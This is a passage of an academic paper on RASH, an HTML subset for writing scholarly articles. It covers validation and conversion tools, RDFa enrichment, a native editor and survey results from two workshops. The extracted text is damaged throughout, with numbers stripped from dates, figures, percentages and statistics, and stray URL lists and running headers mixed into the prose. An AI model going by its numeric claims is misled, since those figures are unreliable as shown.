://www.essepuntato.it> ; pro:holdsroleintime [ a pro:roleintime ; pro:withrole pro:author ; pro:relatestodocument <> ] . </script > <script type=" application/ld+json"> { "@context ": { "nick": "http :// xmlns.com/foaf / . 
/ nick", "sd": "https :// w id.org/scholarlydata/person /" }, "@id": "sd:silvio -peroni", "nick": ["s.", "essepuntato "] } </script > it is worth noticing that rash does not require any particular vocabulary for introducing rdf statements, except three properties from schema.org (http://schema.org) for defining author’s metadata (see the rash documentation (https://rawgit.com/essepuntato/rash/ master/documentation/index.html#metadata) for additional details). for instance, in this document (in particular, in its rash version (https://w id.org/people/essepuntato/ papers/rash-peerj .html)) we mainly use cito (peroni & shotton, ) and other spar ontologies (peroni, a) for creating citation statements about the paper itself, but alternative and/or complementary vocabularies are freely usable as well. the rash framework one of the issues we had to face, and in general anyone has to face when proposing a new markup language, was to provide tools for writing papers in rash. it is undeniable that: • not all the potential authors are able (or willing) to write scholarly articles in html, even within the web community; • not all the potential authors are able (or willing) to manually add additional semantic annotations, even within the semantic web community. the authorial activity of writing an article by using rash, but also any other new web-first format, must be supported by appropriate interfaces and tools to reach a broad adoption. a possible solution was to implement a native html authoring environment, so that authors did not have to deal directly with the new language. however, this solution would have forced all co-authors to use to the same tool and introduced a variety of technical difficulties, since it is not easy to create and support a user friendly and flexible work environment. we believe that a more liberal approach, that allows each author to keep using her/his preferred tools, even off-line, is more practical. this is the idea behind the rash framework (https://github.com/essepuntato/rash) (peroni, ): a set of specifications and writing/conversion/extraction tools for peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://schema.org https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://w id.org/people/essepuntato/papers/rash-peerj .html https://w id.org/people/essepuntato/papers/rash-peerj .html https://github.com/essepuntato/rash http://dx.doi.org/ . /peerj-cs. figure rash framework. the rash framework and its main components. writing articles in rash. in this section, we give a brief description of all the tools we have developed in the framework. all the software components are distributed under an isc license (http://opensource.org/licenses/isc), while the other components are distributed under a creative commons attribution . international license (http://creativecommons.org/licenses/by/ . /). a summary of the whole framework is introduced in fig. . validating rash documents rash has been developed as a relaxng grammar (clark & makoto, ), i.e., a well- known schema language for xml documents. all the markup items it defines are fully compatible with the html specifications (hickson et al., ). 
in order to check whether a document is compliant with rash, we developed a script (https://github.com/essepuntato/rash/blob/master/tools/rash-check.sh) that enables rash users to check their documents simultaneously both against the specific requirements of the rash relaxng grammar and against the html specification, through the w c nu html checker (http://validator.w .org/nu/). this will hopefully help rash users to promptly detect and fix any mistakes in their documents. this script also checks datatype microsyntaxes. in addition to the aforementioned script, we developed a python application (https://github.com/essepuntato/rash/tree/master/tools/rash-validator) that enables one to validate rash documents against the rash grammar. this application also makes available a web interface for visualising all the validation issues retrieved in rash documents.

visualising rash documents

the visualisation of a rash document is rendered by the browser by means of appropriate css (http://www.w .org/style/css/specs.en.html) stylesheets (atkins jr, etemad & rivoal, ) and javascript developed for this purpose. rash adopts external libraries, such as bootstrap (http://getbootstrap.com/) and jquery (http://jquery.com/), in order to provide the current visualisation and to include additional tools for the user. these include, for instance, the footbar with statistics about the paper (i.e., number of words, figures, tables and formulas), a menu to change the actual layout of the page, the automatic reordering of footnotes and references, and the visualisation of the metadata of the paper. the layouts currently available are web-based and springer's lecture notes in computer science (http://www.springer.com/computer/lncs?sgwid= - - - - ); the latter is based on the springer lncs css included in dokieli (http://dokie.li) (capadisli et al., ). note that this kind of automatic rendering of paper items, such as references to a bibliographic entry or a figure, reduces the cognitive effort of an author when writing a rash paper. for instance, a piece of text referencing a table, e.g., ''as shown in table '', is created without caring about the particular text to specify for that reference (''table '' in the example), since rash prescribes specifying just an empty link to the object one wants to refer to, as shown in the following excerpt:

<p>... as shown in <a href="#table_patterns"></a> ...</p>

for these objects, the javascript scripts decide which is the most suitable text to put there according to the type of the item referenced.

converting rash into latex styles

we spent some effort in preparing xslt documents (kay, ) for converting rash documents into different latex styles, such as acm icps (http://www.acm.org/sigs/publications/proceedings-templates) and springer lncs (http://www.springer.com/computer/lncs?sgwid= - - - - ), among others. we believe this is essential to foster the use of rash within international events and to easily publish rash documents in the official latex format currently required by the organisation committees of such events.
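as an illustration of how these conversions work, the following fragment sketches the kind of xslt template such stylesheets can contain. this is a deliberately simplified, hypothetical example (element names are matched in the xhtml namespace, and only headings, paragraphs and emphases are handled), not the actual code of the stylesheets in the rash repository, which cover many more elements and produce complete latex preambles.

<xsl:stylesheet version="2.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:h="http://www.w3.org/1999/xhtml">
  <xsl:output method="text" />
  <!-- a section title becomes a latex \section command -->
  <xsl:template match="h:section/h:h1">
    <xsl:text>\section{</xsl:text>
    <xsl:apply-templates />
    <xsl:text>}&#10;</xsl:text>
  </xsl:template>
  <!-- a paragraph becomes plain text followed by a blank line -->
  <xsl:template match="h:p">
    <xsl:apply-templates />
    <xsl:text>&#10;&#10;</xsl:text>
  </xsl:template>
  <!-- an emphasis maps to \emph -->
  <xsl:template match="h:em">
    <xsl:text>\emph{</xsl:text>
    <xsl:apply-templates />
    <xsl:text>}</xsl:text>
  </xsl:template>
</xsl:stylesheet>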
obviously, the full adoption of rash or any other web-first format would make these stylesheets not necessary but, currently, they are fundamental for the adoption of the overall approach. producing rash from odt and docx we also developed two xslt . documents to perform conversion from apache openoffice documents (https://github.com/essepuntato/rash/blob/master/xslt/from- odt.xsl) and microsoft word documents (https://github.com/essepuntato/rash/blob/ master/xslt/from-docx.xsl) into rash documents. the rash documentation provides a detailed description of how to use apache openoffice (https://rawgit.com/essepuntato/ rash/master/documentation/rash-in-odt.odt) and microsoft word (https://rawgit. com/essepuntato/rash/master/documentation/rash-in-docx.docx) for writing scientific documents that can be easily converted to the rash format. the standard features of these two editors (e.g., styles, document properties, etc.), elements (e.g., lists, pictures, captions, footnotes, hyperlinks, etc.) and facilities (e.g., mathematical editor, cross-reference editor, etc.) can be used to produce fully compliant rash documents. a web-based service, for converting documents online (presented in ‘rocs’) and two java applications for odt (https://github.com/essepuntato/rash/tree/master/tools/odt rash) and docx (https://github.com/essepuntato/rash/tree/master/tools/docx rash) documents (that can be downloaded and used offline on the local machine) were developed to facilitate the conversion process of apache openoffice and microsoft word documents into the rash format. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - http://dokie.li https://peerj.com http://www.acm.org/sigs/publications/proceedings-templates http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://github.com/essepuntato/rash/tree/master/tools/odt rash https://github.com/essepuntato/rash/tree/master/tools/docx rash http://dx.doi.org/ . /peerj-cs. figure rocs. the architecture of rocs. in the past few years, as sort of alpha-testing, we have used these conversion approaches with many internal projects in the digital and semantic publishing laboratory of the department of computer science and engineering at the university of bologna. moreover, also our co-authors and collaborators from different disciplines (e.g., business and management, humanities, medicine, etc.) have successfully used this approach for producing their documents, giving us a chance to have fruitful feedback, comments, and suggestions. in particular, we have been able to convert with discrete success several odt and docx files of research papers, phd theses, documentations, and project proposals and deliverables. 
rocs we created an online conversion tool called rocs (rash online conversion service) (http://dasplab.cs.unibo.it/rocs) (di iorio et al., ) for supporting authors in writing rash documents and preparing submissions that could be easily processed by journals, workshops, and conferences. rocs integrates the tools introduced in the previous sections. the abstract architecture of the tool is shown in fig. . rocs allows converting either an odt document or a docx document, written according to specific guidelines, into rash and, then, into latex according to the following layouts: springer lncs, acm ipcs, acm journal large, peerj. such guidelines, introduced in ‘producing rash from odt and docx’, are very simple and use only the basic features available in apache openoffice writer and in microsoft word, without any external tool or plug-in. rocs allows users to upload four kinds of file, i.e., an odt document, a docx document, an html file compliant with rash, and a zip archive which contains an peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dasplab.cs.unibo.it/rocs http://dx.doi.org/ . /peerj-cs. the source code and binaries of spar xtractor are available at https://github. com/essepuntato/rash/tree/master/sources/ spar-xtractor and https://github.com/ essepuntato/rash/tree/master/tools/spar- xtractor, respectively. the prefix po: stands for the namespace http://www.essepuntato.it/ / / pattern#. html file compliant with rash and related files (i.e., csss, javascript files, fonts, images). it returns a zip archive containing the original document plus all its converted versions, i.e., rash, if an odt/docx file was given, and the latex file. the main advantage of having the paper both in rash and in latex is that it is fairly easy for rash to be adopted by workshops, conferences or journals. since the program committee, the reviewers, and the editors have also access to a latex or a pdf version of the paper, the rash file is an addition that does not preclude any current workflows. of course, the hope is that the inherent advantages of an html-based format such as rash will eventually persuade stakeholders to adopt the html version whenever it is possible, keeping the alternatives as fall-back options. enriching rash documents with structural semantics another development of the rash framework concerns the automatic enrichment of rash documents with rdfa annotations defining the actual structure of such documents in terms of the frbr-aligned bibliographic ontology (fabio) (http://purl.org/spar/fabio) and the document component ontology (doco) (http://purl.org/spar/doco) (constantin et al., ). more in detail, we developed a java application called spar xtractor suite . spar xtractor is designed as a one-click tool able to add automatically structural semantics to a rash document. spar xtractor takes a rash document as input and returns a new rash document where all its markup elements have been annotated with their actual structural semantics by means of rdfa. the tool associates a set of fabio or doco types with specific html elements. the set of html elements and their associations with fabio or doco types can be customised according to specific needs of expressivity. the default association provided by the current release of spar xtractor is the following: • the root html element is mapped to an individual of the class fabio:expression (http://purl.org/spar/fabio/expression). 
the class fabio:expression identifies the specific intellectual or artistic form that a work takes each time it is realised; • the body element is mapped to an individual of the class doco:bodymatter (http://purl.org/spar/doco/bodymatter). the class doco:bodymatter is the central principle part of a document, it contains the real document content, and it is subdivided hierarchically by means of sections; • p elements are represented as individuals of the class doco:paragraph (http: //purl.org/spar/doco/paragraph), i.e., self-contained units of discourse that deal with a particular point or idea; • figure elements containing the element img within a paragraph are represented as individuals of the class doco:figurebox (http://purl.org/spar/doco/figurebox), which is a space within a document that contains a figure and its caption; • section elements are mapped to individuals of the class doco:section (http: //purl.org/spar/doco/section), which represents a logical division of the text. sections can be organised according to a variable level of nested sub-sections. accordingly, spar xtractor reflects this structural behaviour by representing the containment relation by means of the object property po:contains (http://www.essepuntato.it/ / / pattern#contains) . for example, a certain section element with a nested section peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor http://www.essepuntato.it/ / /pattern# http://www.essepuntato.it/ / /pattern# https://peerj.com http://purl.org/spar/fabio http://purl.org/spar/doco http://purl.org/spar/fabio/expression http://purl.org/spar/doco/bodymatter http://purl.org/spar/doco/paragraph http://purl.org/spar/doco/paragraph http://purl.org/spar/doco/figurebox http://purl.org/spar/doco/section http://purl.org/spar/doco/section http://www.essepuntato.it/ / /pattern#contains http://www.essepuntato.it/ / /pattern#contains http://dx.doi.org/ . /peerj-cs. element produces two individuals of the class doco:section (e.g., :section_outer a doco:section and :section_inner a doco:section) related by the property po:contains (e.g., section_outer po:contains :section_inner). in addition to these semantic annotations, which come from the actual structure of a document, the tool is also able to automatically detect sentences and annotate them as individuals of the class doco:sentence (http://purl.org/spar/doco/sentence). a doco:sentence denotes an expression in natural language forming a single grammatical unit. for the sentence detection task, spar xtractor relies on the sentence detection module of the apache opennlp project (https://opennlp.apache.org/), which provides a machine learning based toolkit for the processing of natural language text. by default, spar xtractor is released to support english only. however, it is possible to extend it with new languages by adding their corresponding models for apache opennlp, most of which are available with an open licence (http://opennlp.sourceforge.net/models- . /). 
we remark that the object property po:contains is used for representing any kind of containment relation among the structural components that spar xtractor deals with. hence, the usage of such a property is not limited to the individuals of the class doco:section only. in fact, the property po:contains can be used, for example, for expressing the containment relation between a doco:bodymatter and a doco:section or between a doco:section and a doco:sentence. for example, let us consider the following code snippets that provide a sample html document. <html > ... <body > ... <section ><h >a section </h > ... <p>this is a sentence. this is another sentence of this paragraph.</p> ... <section ><h >a sub -section </h > ... </section > ... </section > ... </body > </html > the html document in the snippet above is enriched by spar xtractor resulting in the document reported in the snippet below. <html resource =" expression" typeof ="http :// purl.org/spar/fabio/expression"> ... <body resource ="body" typeof ="http :// purl.org/spar/doco/bodymatter" property ="http ://www.essepuntato.it / / / pattern#contains"> ... <section resource =" section_outer" typeof ="http :// purl.org/spar/doco/section" property ="http ://www.essepuntato.it / / / pattern#contains"> <h resource =" section_outer/title" typeof ="http :// purl.org/spar/doco/sectiontitle" > <span property ="http :// purl.org/spar/c o/hascontent"> a section </span > </h > ... <p resource =" section_outer/paragraph - " typeof ="http :// purl.org/spar/doco/paragraph" property ="http ://www.essepuntato.it / / / pattern#contains" > peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/spar/doco/sentence https://opennlp.apache.org/ http://opennlp.sourceforge.net/models- . / http://dx.doi.org/ . /peerj-cs. <span property ="http ://www.essepuntato.it / / / pattern#contains" resource =" section_outer/paragraph - / sentence - " typeof ="http :// purl.org/spar/doco/sentence"> <span property ="http :// purl.org/spar/c o/hascontent"> this is a sentence. </span > </span > <span property ="http ://www.essepuntato.it / / / pattern#contains" resource =" section_outer/paragraph - / sentence - " typeof ="http :// purl.org/spar/doco/sentence"> <span property ="http :// purl.org/spar/c o/hascontent"> this is another sentence of this paragraph. </span > </span > </p> ... <section resource =" section_inner" typeof ="http :// purl.org/spar/doco/section" property ="http ://www.essepuntato.it / / / pattern#contains"> <h resource =" section_inner/title" typeof ="http :// purl.org/spar/doco/sectiontitle" "> <span property ="http :// purl.org/spar/c o/hascontent"> a sub -section </span > </h > ... </section > ... </section > ... </body > </html > writing rash documents with a native editor a recent development of rash is the rash javascript editor (raje) (https://github.com/ essepuntato/rash/tools/raje) (spinaci et al., ), a multiplatform what you see is what you get (wysiwyg) word processor for writing scholarly articles in html, according to the rash format. in particular raje allows authors to write research papers in html natively by means of a user-friendly interface, instead of writing raw markup with an ide, a text editor or any external word processor raje guarantees to its users the benefits of a word processor combined with those given by an html-based format, i.e., interactiveness, accessibility and easiness to be processed by machine. 
in addition, raje uses the github api (https://api.github.com/) so as to allow authors to store their articles online, to keep track of changes by means of the github services, and to share the articles with others. rash and save-sd: an evaluation the true validation for rash as a format for research papers rests on its adoption by authors and workshops and its integration in the publishing process. for this reason, rash was first released in conjunction with the semantics, analytics, visualisation: enhancing scholarly data (save-sd ) workshop (http://cs.unibo.it/save-sd/ / index.html), co-located with www . it was subsequently adopted by a number of workshops and conferences (https://github.com/essepuntato/rash/#rash-papers-accepted- in-scholarly-venues). in this section, we will present an evaluation of rash based on the analysis of questionnaires completed by authors and reviewers of save-sd and save-sd (http://cs.unibo.it/save-sd/ /index.html) workshops and a study on rdf annotations in the relevant papers. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/essepuntato/rash/tools/raje https://github.com/essepuntato/rash/tools/raje https://api.github.com/ http://cs.unibo.it/save-sd/ /index.html http://cs.unibo.it/save-sd/ /index.html https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues http://cs.unibo.it/save-sd/ /index.html http://dx.doi.org/ . /peerj-cs. the users were asked to fill a questionnaire which included a section about their background, a sus questionnaire and six open questions about their experience with rash. we will first introduce the two workshops and then discuss and compare the evaluation results. finally, we will present an analysis of the most frequent vocabularies and entities in rash papers. the completed questionnaires and the outcomes of the analysis are available at osborne & peroni ( ), while the rdf annotations considered in the study are embedded in the rash papers available in the save-sd and save-sd websites. we used the online version of the rdfa . distiller (https://www.w .org/ /pyrdfa/) for extracting the rdf annotations from the rash papers. it is worth noting that in there were no converters in the rash framework, and rocs was introduced immediately before save-sd . thus, in both years authors wrote rash papers with plain text editors or xml editors, apart from one author that used rocs in . in general, the authors appreciated rash and the tools in the rash framework, even if the editing environment and the converters are still limited. save-sd and save-sd was organized by some of the authors of this paper with the aim of bringing together publishers, companies, and researchers in order to bridge the gap between the theoretical/academic and practical/industrialaspects in regard toscholarly data. itwas thus a multifaceted workshop which drew researchers from a number of heterogeneous fields, such as document and knowledge engineering, semantic web, natural language processing, scholarly communication, bibliometrics and human–computer interaction. since many of the interested researchers were keen on experimenting with novel technologies regarding semantic publishing, it was a natural choice for the debut of rash. for this reason, save-sd allowed authors to submit papers using either rash or pdf, explicitly encouraging authors to test the new format. 
to this end, the organisers introduced a special award for the best submission in rash, according to the quality of the markup, the number of rdf statements defined in rdfa, and the number of rdf links to lod datasets. the possibility of submitting in rash was also advertised on social media (e.g., twitter (https: //twitter.com/savesdworkshop)), facebook (https://www.facebook.com/savesdworkshop)) and during various international events (e.g., dl (http://www.city.ac.uk/digital- libraries- ), ekaw (http://www.ida.liu.se/conferences/ekaw /home.html), force (https://www.force .org/meetings/force )). the initiative had a substantial success: the workshop received six out of submissions in rash and after the review process an additional author chose to prepare the camera- ready paper in rash. out of these seven final submissions, three were research papers, one was a position paper, and three posters/demo. these papers were submitted by authors from switzerland, italy, germany, netherlands, united kingdom, ireland, and the usa. at the time of the workshop submission deadline, there were no public tools available for converting other formats into rash. however, the authors were able to self-learn it by simply referring to the documentation page, confirming that computer scientists have no particular problem in handling it directly. the conversion of the rash submissions into the acm format requested by the sheridan publisher (responsible for the publications of peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/ /pyrdfa/ https://twitter.com/savesdworkshop https://twitter.com/savesdworkshop https://www.facebook.com/savesdworkshop http://www.city.ac.uk/digital-libraries- http://www.city.ac.uk/digital-libraries- http://www.ida.liu.se/conferences/ekaw /home.html https://www.force .org/meetings/force http://dx.doi.org/ . /peerj-cs. table user background for save-sd , save-sd . year ms word oo writer latex html xml relaxng sw rdfa turtle json-ld % % % % % % % % % % % % % % % % % % % % avr % % % % % % % % % % all www proceedings) was handled by the organisers through a semi-automatic process. in particular, they used the xslt files introduced in ‘converting rash into latex styles’ and had to fix only a few layout misalignments. six authors and four reviewers involved in save-sd participated in our evaluation. save-sd had the same characteristics and goals of the predecessor. in order to give authors full freedom, the organizer decided to accept not only rash, but any kind of html-based format. since it was not possible to handle the conversion of all possible html-based format to the publisher layout, the authors of alternative formats were asked to prepare a pdf of the camera-ready version according to the publisher needs. save-sd received out of submissions in rash from authors from italy, sweden, greece, germany, belgium, and the usa. in total, five out of the accepted papers were in rash, including two full papers, two demos, and one position paper. even if no author chose to submit in other html-based formats, this possibility will be kept open in future editions. differently from the previous edition, the proceedings were published as a dedicated lncs volume. the conversions of rash papers to the pdf documents in springer lncs layout was automatically handled by rocs. as in the previous workshop, we evaluated rash by conducting the same study (with the same exact questions) on ten people. 
seven authors of rash papers and three reviewers participated in the survey.

user background

it is useful to first assess the background of rash pioneer users in terms of their knowledge of relevant technologies and software. for this reason, the first section of the survey included a number of statements about the user expertize (e.g., ''i have extensive experience in writing academic papers with latex'') and allowed five response options, from ''strongly agree'' to ''strongly disagree''. table shows the percentage of users who claimed to be familiar with a range of technologies (by selecting ''agree'' or ''strongly agree'').

in the first edition, the authors were mainly from the semantic web community and therefore familiar with technologies such as rdfa and turtle. most of them knew how to correctly annotate an html file and understood the advantages of including semantic relationships in the paper. they also commonly used latex rather than microsoft word or openoffice writer. this suggests that they were acquainted with non-wysiwyg editors and had experience with complex formats. a qualitative analysis of the survey answers confirms this intuition; for example, an author remarked: ''i am used to writing papers in latex so i do not want to bother with formatting and in that sense rash is similar''. in the second edition the situation changed, and only % of the users were familiar with semantic technologies. in addition, even if most of them knew how to use latex, the majority of them also had experience with microsoft word. it thus seems that rash started to interest also less technical users with different research backgrounds.

user survey

we assessed the strengths and weaknesses of rash by means of six open questions. we summarize here the answers of both authors and reviewers for the two workshop editions. the reviewers answered only questions , , and . note that the questions were exactly the same in both editions and that none of the users participated in both surveys.

save-sd survey

• [q ] why did you choose the rash format for your paper? four authors answered that the main reason was to try it out, mostly because they ''supported the idea of publishing academic papers as html'' and were convinced that ''pdf should be replaced''. two of them added that they were motivated by the possibility of adding semantic annotations to their papers.

• [q ] how effectively did rash support you in writing/reviewing the paper? the majority of the authors suggested that some tasks, such as setting up the bibliography, were still cumbersome. they added that the development of tools that could solve these issues and hide the technical details from common users would be very important for a broader adoption. the reviewers remarked that their experience was very similar to reviewing a paper in pdf format and did not present any particular challenge (e.g., ''did not have many features that would distinguish it from a pdf'', ''it met all of my needs and was easy to use'').

• [q ] what were the most useful features of rash in helping you write/review the paper? the authors listed a number of functionalities, including the multiple graphical layouts (two authors), the support of rdfa annotations (two) and the built-in validation (one). the ability to display the paper according to different layouts was also praised by reviewers.

• [q ] what were the main weaknesses that rash exhibited in supporting the writing/reviewing of the paper?
most authors suggested that the handling of bibliography, figures and captions should be improved. half of them also pointed out that the manual insertion of semantic annotations was cumbersome and a large amount of rdfa ‘‘introduces a bit of confusion in the paper’’. an author observed that using the word count as a limit in the rash venues rather than the number of pages introduces the issue of possibly exceeding the editor limits. most reviewers did not report any problem in using rash for assessing a paper. however, one of them noted that it still lacked a menu for easily navigating the different sections, as pdf files instead support. • [q ] can you think of any additional features to be included in rash that would have helped you to write/review the paper? the majority of authors suggested that the aforementioned limitations were mainly peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. due to the use of an html editor, requesting the development of a wysiwyg editor or a tool for converting from odt to rash. a user also suggested developing a tool for graphically showing the semantic annotations, as ‘‘what is linked to what, in order to check the correctness of assertions’’ and a reviewer advised to implement a way to easily access the different sections of the document. • [q ] would you use rash regularly for writing your academic papers? five out of six authors answered they would like to keep using rash. most of them, however, added that this would also depend on the creation of a better editor and a solid array of tools for managing technical details and converting standard formats for writing a research paper to and from rash. save-sd survey • [q ] why did you choose the rash format for your paper? as with the results, the majority of the authors (four) claimed that they adopted it for trying a new format, three authors because they were motivated by the workshop and three because they actively support the ideas behind rash. • [q ] how effectively did rash support you in writing/reviewing the paper? five users wrote the papers directly in rash and only one used open office and then converted it with rocs. in the first group, one user was positive, one neutral, and three suggested the need for a wysiwyg editor, since ‘‘writing in html is not so effective’’ and ‘‘not everyone [of the co-authors] knew how to validate against the schema’’. in particular, it was suggested the need for a microsoft word converter, since the odt produced by microsoft word could not be processed by rocs. as in , the reviewers did not find many differences with respect to pdf papers. one of them claimed to actually prefer rash since it ‘‘makes better use of the page space’’. • [q ] what were the most useful features of rash to help you writing/reviewing the pa- per? the authors mentioned a variety of different features including the formatting semantics (‘‘no worries about section and layout’’), the bibliographic reference management and the ability to display the paper according to different layouts. a reviewer also praised the ability to convert rash to pdf. • [q ] what were the main weaknesses that rash exhibited in supporting the writing/re- viewing of the paper? differently from , the authors had no particular problem with the handling of bibliography, figures, and captions. however, most of them (five) remarked that directly writing the html code was not trivial. 
three of them suggested solving the problem by introducing a wysiwyg editor, while two of them suggested creating new converters to translate latex and microsoft word into rash. one user also flagged that the visualisation of a rash document can change in different browsers. the reviewers, as in the previous edition, did not report any particular problem in using rash.

• [q ] can you think of any additional features to be included in rash that would have helped you to write/review the paper? consistently with the aforementioned weaknesses and with the results of the previous edition, the users called for the creation of a wysiwyg editor ( ) and for a way to convert from latex and microsoft word ( ). in addition, a user suggested a tool for automatically generating a bibliography, similar to bibtex.

• [q ] would you use rash regularly for writing your academic papers? three authors asserted that they would be happy to keep using rash, two of them that they were ready to use it again, depending on its development, and only one was negative about it.

rash usability

we also performed a quantitative analysis of the usability of rash, using the system usability scale (sus) questionnaire (brooke, ). the scores are acceptable, though not very high, especially if we consider that all authors but one edited rash files directly with text/xml editors. users perceived even a ''vanilla'' rash as acceptable, though they need more sophisticated converters, as remarked in the open questions of the survey. rash yielded a mean score of . ± . , slightly lower than the average sus score ( ). however, sus scores varied dramatically according to the person's background. for this analysis, the authors who answered ''strongly agree'' to the background questions were classified as ''experts'', the ones who answered ''agree'' as ''familiars'', and all the others as ''not familiar''. figure shows the results for different categories of expertize in html, latex, and semantic web technologies (swt), which appear correlated with the average sus scores (respectively r = . , . , . ). users with a strong expertize in latex and swt yielded significantly better sus scores than the other authors, while authors with html expertize yielded only slightly better scores. for this reason, the authors from the first edition, who, as previously discussed, had a higher expertize in these categories, obtained an average sus score of . ± . , while the authors from the second edition yielded . ± . . however, the difference is not statistically significant because the two samples are small and the test power is low. these results further confirm that most users with limited expertize in non-wysiwyg editors and semantic technologies find it unfeasible to write html directly, even in a simplified form.

analysis of rdf annotations in rash documents

to complete the previous analysis, we also studied the nature of the semantic annotations in rash papers. we focused on a sample of , annotations obtained from the papers published in save-sd and . the number of statements in a single paper was found to range from to , yielding a median value of ( th percentile , th percentile ). we extracted all the rdf statements by running the w c rdfa . distiller service (https://www.w .org/ /pyrdfa/) on each article. we then considered only the statements that used http-based entities as predicates, or as their objects when used for typing resources.
the data are organised in several csv files and have been obtained by running a python script we developed for gathering the data used in this evaluation. the script and all the aforementioned data have been made available at osborne & peroni ( ). the first goal of the study was to determine the prevalent vocabularies and how much they were used in the average paper. the left panel of fig. a shows the common vocabularies. schema.org and prism are actually enforced by rash: the first is used for standard metadata such as emails, affiliations and organization names and the second for keywords. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/ /pyrdfa/ http://dx.doi.org/ . /peerj-cs. figure expertize vs. perceived usability. user expertize in html, latex and semantic web tech- nologies versus average sus score. figure average number of statements per vocabulary. percentage of papers and average number of statements using a vocabulary. in addition, a quantity of rdf statements was automatically extracted when processing dpub-aria roles (garrish et al., ). thus we will not consider such vocabularies in the rest of the evaluation. the other common vocabularies are dublin core, which appears in % of the papers, foaf ( %) and the spar ontologies (peroni, a), such as fabio ( %) and cito ( %) (peroni & shotton, ). the right panel of fig. b illustrates the average number of statement for each of these vocabularies. dublin core characterizes the highest number of annotation ( . ), followed by foaf ( . ) and fabio ( . ). peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average number of entities per vocabulary. average percentage of vocabulary entities in a rash paper (excluding the mandatory ones). we also performed a more fine-grained analysis considering the amount of entities of these vocabularies within the various rdf statements. the goal was to understand the percentage of contribution that the various entities provide (on average) to the statements of the document analysed. as expected, the entities that contribute to about % of the statements are either those that are obliged by rash (prism:keyword . %, schema:affiliation . %, schema:name . %, and schema:email . %) or those automatically extracted by processing the dpub roles included, mandatorily, in the documents (xhtml:role %). excluding these, the following top ten entities, shown in fig. , cover about % of the statements. among these entities, there are three classes describing three diverse but interlinked kinds of objects, i.e., people (foaf:person) authoring a research work (fabio:researchpaper) and the sentences (doco:sentence) therein contained. the other seven entities are three object properties—two of them (pav:authoredby and pattern:contains) provide the links between the three aforementioned classes, while the other, i.e., cito:cites, describes citation links between papers—and four data properties—used for providing additional metadata about the entities (dcterms:title, dcterms:bibliographiccitation, foaf:name) and for describing bunches of textual content of the sentences (c o:hascontent). discussion the evaluation study confirmed that rash is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are already familiar with html. however, it also highlighted some issues in the adoption of html formats, especially by less technically savvy users. 
interestingly, the survey showed that rash is also being tried by users unfamiliar with semantic web technology. while the expansion of the user base represents a positive development, it also yields a number of challenges. authors accustomed to wysiwyg editors such as microsoft word or openoffice writer tend to have difficulties with html editors. in addition, since research papers are often written by multiple authors, it is usually simpler to use the most well-known solutions. for these reasons, we need to offer the authors who currently cannot or do not want to change their workflow the tools for converting their favourite format into rash and for annotating the resulting paper. while odt was a first step in this direction, it is imperative to also be able to process docx (which has already been implemented) and latex. a second important issue is that authors who are not expert in semantic technologies can find it hard to correctly annotate their papers. hence, we also need to use and/or develop simple tools for helping authors in this phase, such as the openlink structured data editor (http://osde.openlinksw.com/). the introduction of these solutions will be critical for motivating users to adopt html-based approaches and for creating a robust framework that can be used by expert and common users alike.

as far as the analysis of the rdf annotations in rash documents is concerned, the outcomes highlighted that the users decided to adopt a few well-known standard vocabularies, rather than using a multiplicity of different solutions. the most used vocabularies, other than schema.org and prism (used by default by rash), are dublin core, foaf, and the spar ontologies. however, the outcomes of our evaluation generally show a rather low number of statements specified by the authors. this behaviour could derive from the lack of appropriate support for the annotation of rash papers with rdf data. in addition, this low number does not seem to be related to the research community the authors work in. for instance, several of the papers written by semantic web experts do not include any rdf statements other than those enforced by rash.

conclusions

in this paper we have introduced rash, a markup language defined as a subset of html for writing scientific articles, and the rash framework, a set of specifications and tools for writing articles in rash. in particular, we have discussed the rationale behind the development of rash, and we have presented the language and the validation/visualisation/conversion/extraction/editing tools developed so far. the goal of the paper was also to investigate the applicability and the potential of rash, through the evaluation of its adoption in two save-sd workshops. to the best of our knowledge, this is the first empirical evaluation of the adoption of html-based languages for writing scientific papers. the experiments proved that rash can be successfully used for workshops and conferences, with good acceptance by the authors and a smooth integration into the existing publishing process. as immediate future developments, we plan to develop tools for automating the process of semantic enrichment of rash documents.
